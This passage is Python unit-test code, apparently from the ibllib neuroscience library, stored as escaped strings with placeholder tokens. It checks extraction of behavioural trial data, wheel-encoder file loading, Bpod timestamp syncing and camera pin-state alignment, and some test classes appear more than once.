2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = 
np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = 
len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = 
np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = 
training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = 
biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def 
test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n 
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n 
tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = 